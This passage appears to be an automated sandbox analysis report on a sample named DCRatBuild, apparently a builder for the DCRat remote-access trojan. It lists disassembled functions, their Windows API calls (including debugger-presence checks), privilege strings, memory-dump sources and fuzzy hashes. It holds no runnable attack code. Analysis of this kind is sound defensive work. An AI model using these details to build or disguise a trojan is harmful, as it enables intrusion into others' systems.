                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00497298
                                                                                                                          • Part of subcall function 00499DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004973BC,?,?,?,00000000), ref: 00499DBC
                                                                                                                          • Part of subcall function 00499DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00499E70
                                                                                                                          • Part of subcall function 00499620: CloseHandle.KERNELBASE(000000FF,?,?,004995D6,?,?,?,?,?,004C2641,000000FF), ref: 0049963B
                                                                                                                          • Part of subcall function 0049A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A501
                                                                                                                          • Part of subcall function 0049A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A532
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                        • API String ID: 3983180755-3508440684
                                                                                                                        • Opcode ID: 448a3ad46d1e8d87d5246563197dbff8d69ebe375f09eefd84bab1ac94b2af0b
                                                                                                                        • Instruction ID: deaa5cb129d6765a03ff3a5fdbb226ba3e7a6575c05cee0acf82f9e71ddc636c
                                                                                                                        • Opcode Fuzzy Hash: 448a3ad46d1e8d87d5246563197dbff8d69ebe375f09eefd84bab1ac94b2af0b
                                                                                                                        • Instruction Fuzzy Hash: 55C1B571914604AADF21EB75CC41FEFBBA8AF05304F00456FF956E7282D738AA44CB69
                                                                                                                        Function 004BD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                        • Opcode ID: 4d8496bb9beecf522b420327b24cfe532e4bb3a648dfb6fe9476741fd8ab124d
                                                                                                                        • Instruction ID: 9f9d6d471bdcd8cb4a2f61d0a615371f3d6e740c4ed5d1042a74342c09775beb
                                                                                                                        • Opcode Fuzzy Hash: 4d8496bb9beecf522b420327b24cfe532e4bb3a648dfb6fe9476741fd8ab124d
                                                                                                                        • Instruction Fuzzy Hash: 71C26A71E086288FDB25CE29DD407EAB7B9EB84304F1441EBD84DE7240E779AE818F55
                                                                                                                        Function 004932F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog_swprintf
                                                                                                                        • String ID: CMT$h%u$hc%u
                                                                                                                        • API String ID: 146138363-3282847064
                                                                                                                        • Opcode ID: 807c76de4cad80adbd281717522ac1f526bf03d80a0df17b9f59b7c4a641a65b
                                                                                                                        • Instruction ID: bdefe928399178a8bc225cf48c3cc8c7c99c5467df457b5334d52e78fc9e7f7a
                                                                                                                        • Opcode Fuzzy Hash: 807c76de4cad80adbd281717522ac1f526bf03d80a0df17b9f59b7c4a641a65b
                                                                                                                        • Instruction Fuzzy Hash: E632E671514284AFDF14DF74C895AEA3FA5AF16304F04447FFD8A8B282D778AA49CB24
                                                                                                                        Function 0049286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00492874
                                                                                                                        • _strlen.LIBCMT ref: 00492E3F
                                                                                                                          • Part of subcall function 004A02BA: __EH_prolog.LIBCMT ref: 004A02BF
                                                                                                                          • Part of subcall function 004A1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0049BAE9,00000000,?,?,?,00010422), ref: 004A1BA0
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00492F91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                        • String ID: CMT
                                                                                                                        • API String ID: 1206968400-2756464174
                                                                                                                        • Opcode ID: 8c4b37b882a231bea77eac90be39d614820d94b4d39364d4ec2d8e0c68140f31
                                                                                                                        • Instruction ID: a81a3659e10a5899cf8c41461d3f8c704e6669bfb5df9b0f5b31a3ac916de11f
                                                                                                                        • Opcode Fuzzy Hash: 8c4b37b882a231bea77eac90be39d614820d94b4d39364d4ec2d8e0c68140f31
                                                                                                                        • Instruction Fuzzy Hash: BB6226716002449FDF19DF38C9856EA3FA1AF15304F08457FEC9A8B382D7B8A945CB28
                                                                                                                        Function 004AF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004AF844
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004AF910
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004AF930
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 004AF93A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 254469556-0
                                                                                                                        • Opcode ID: fa1d1eeeaf7d9dd63e731c11f7bb3131ea7230a723d56f478ad4a7c417e68999
                                                                                                                        • Instruction ID: f88e6d07126bd016a0955cce8c55df5d26fabd6492faba2324d3684a6079aa01
                                                                                                                        • Opcode Fuzzy Hash: fa1d1eeeaf7d9dd63e731c11f7bb3131ea7230a723d56f478ad4a7c417e68999
                                                                                                                        • Instruction Fuzzy Hash: 7F314B75D052199FDB10DFA4D989BCDBBB8AF18305F1040AAE40CA7250EB759B888F08
                                                                                                                        Function 004AE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(80000000,004AE5E8,0000001C,004AE7DD,00000000,?,?,?,?,?,?,?,004AE5E8,00000004,004F1CEC,004AE86D), ref: 004AE6B4
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,004AE5E8,00000004,004F1CEC,004AE86D), ref: 004AE6CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 401686933-2746444292
                                                                                                                        • Opcode ID: df4614f07e6be74cbdaa9bf6f3350cf96b7f26706112886d9d06772069c3f5c6
                                                                                                                        • Instruction ID: fc96dc7fa062a88e75b69fb4ae22b9a3f691221488bffe9b012f6d895b7b42be
                                                                                                                        • Opcode Fuzzy Hash: df4614f07e6be74cbdaa9bf6f3350cf96b7f26706112886d9d06772069c3f5c6
                                                                                                                        • Instruction Fuzzy Hash: 3E012B766001096BDF14DE6ADC09FEE7BAAEFD5328F0CC121ED29D7250DA38D9058684
                                                                                                                        Function 004B8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004B8FB5
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004B8FBF
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 004B8FCC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3906539128-0
                                                                                                                        • Opcode ID: d10dc19dae29b874dca6be33aeea0c5f18e10f6e189a6ea01248b0d92552dddd
                                                                                                                        • Instruction ID: c87eb453f17ea18e5adea41704026456c15d14f555f84dc9940863217d7546b6
                                                                                                                        • Opcode Fuzzy Hash: d10dc19dae29b874dca6be33aeea0c5f18e10f6e189a6ea01248b0d92552dddd
                                                                                                                        • Instruction Fuzzy Hash: 4F31D474901218ABCB61DF65DC88BDDBBB8EF18311F5041EAE41CA7250EB349F858F58
                                                                                                                        Function 004BD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                        • Instruction ID: d5b4d9e222b88a5dfd5ff8230583a7f2376b9fc63727e1a4c2a57d1ebc765a6a
                                                                                                                        • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                        • Instruction Fuzzy Hash: CF022D71E002199FDF14DFA9C9806EEBBF1EF48314F1581AAD819E7344EB34A941CB94
                                                                                                                        Function 004AAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004AAF35
                                                                                                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,004CE72C,?,?), ref: 004AAF84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169056816-0
                                                                                                                        • Opcode ID: 64ac774ec2a551ccc37aba45875822239b2708e68db3538b05dc5f8867838cb6
                                                                                                                        • Instruction ID: e3b2f73eb387b42ff2971f20792b6f9602b94e85543a8cea7c831b4117afdc46
                                                                                                                        • Opcode Fuzzy Hash: 64ac774ec2a551ccc37aba45875822239b2708e68db3538b05dc5f8867838cb6
                                                                                                                        • Instruction Fuzzy Hash: 12019A3A110348AED7109F61EC45F9A77B8FF09310F108432FA04AB191E374A928CBA9
                                                                                                                        Function 00496C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00496DDF,00000000,00000400), ref: 00496C74
                                                                                                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00496C95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: 4535ba0a7a1d567732a1be353c84be28c7a204ae138d3d52fb481ab6e6e59d1f
                                                                                                                        • Instruction ID: 0a870a2a42a0215db0a570340df6b584ddfab269cdc5b994febb951a35024afa
                                                                                                                        • Opcode Fuzzy Hash: 4535ba0a7a1d567732a1be353c84be28c7a204ae138d3d52fb481ab6e6e59d1f
                                                                                                                        • Instruction Fuzzy Hash: E7D0C932344300BFFE510F628D06F6B7F99BF45B56F19C425B795E80E0CA789425A62D
                                                                                                                        Function 004C19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004C19EF,?,?,00000008,?,?,004C168F,00000000), ref: 004C1C21
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 9a34a5d23b5a595d628286b5877cda1c5343bcd2942041a95c0c00561a62ce61
                                                                                                                        • Instruction ID: 0fc9d923d41c6440e5ec80e3e12e575f2bacb17b785a8fd919f3a67a07e21d3a
                                                                                                                        • Opcode Fuzzy Hash: 9a34a5d23b5a595d628286b5877cda1c5343bcd2942041a95c0c00561a62ce61
                                                                                                                        • Instruction Fuzzy Hash: C5B14B392106089FD755CF28C486B657BE0FF06364F25865DE89ACF2A2D339ED92CB44
                                                                                                                        Function 004AF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004AF66A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2325560087-0
                                                                                                                        • Opcode ID: 7eae7918120332fba8430237d289656b4045f0a1dc763eb5453cd35275866535
                                                                                                                        • Instruction ID: 69a50a29e5c177264ba1fa1fe17437093a7f0b046c710e48dccd8ec3c3a5ca00
                                                                                                                        • Opcode Fuzzy Hash: 7eae7918120332fba8430237d289656b4045f0a1dc763eb5453cd35275866535
                                                                                                                        • Instruction Fuzzy Hash: 9A51A0B5901619CFEB24CFD5E8857AABBF0FB59304F24843AC411EB360D379A904CB58
                                                                                                                        Function 0049B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0049B16B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1889659487-0
                                                                                                                        • Opcode ID: f22f540bc0f0d90fee35813926772e3849831261681d37881c491d9bbd1bd468
                                                                                                                        • Instruction ID: 50f339ae4ed780f272b98a02921cfb2c89946e39c0a893035efeaa3c5dde1bd3
                                                                                                                        • Opcode Fuzzy Hash: f22f540bc0f0d90fee35813926772e3849831261681d37881c491d9bbd1bd468
                                                                                                                        • Instruction Fuzzy Hash: 28F030B4E002189FDB18DB19FD92AD577F1F748355F1042B7D915937A0C374A980CEA9
                                                                                                                        Function 004940FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: gj
                                                                                                                        • API String ID: 0-4203073231
                                                                                                                        • Opcode ID: 98ca81905aebf93b9add477c1f0418b2ea6fb5fc7b4609f9234565f1d369525d
                                                                                                                        • Instruction ID: cbc574451a30c1a3b7117596e628da4f77209db65d748ffea7586ae2fc0a8170
                                                                                                                        • Opcode Fuzzy Hash: 98ca81905aebf93b9add477c1f0418b2ea6fb5fc7b4609f9234565f1d369525d
                                                                                                                        • Instruction Fuzzy Hash: 23C14772A083418FC354CF29D880A5AFBE1BFC9708F19892EE998D7311D734E955CB96
                                                                                                                        Function 004AF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,004AF3A5), ref: 004AF9DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
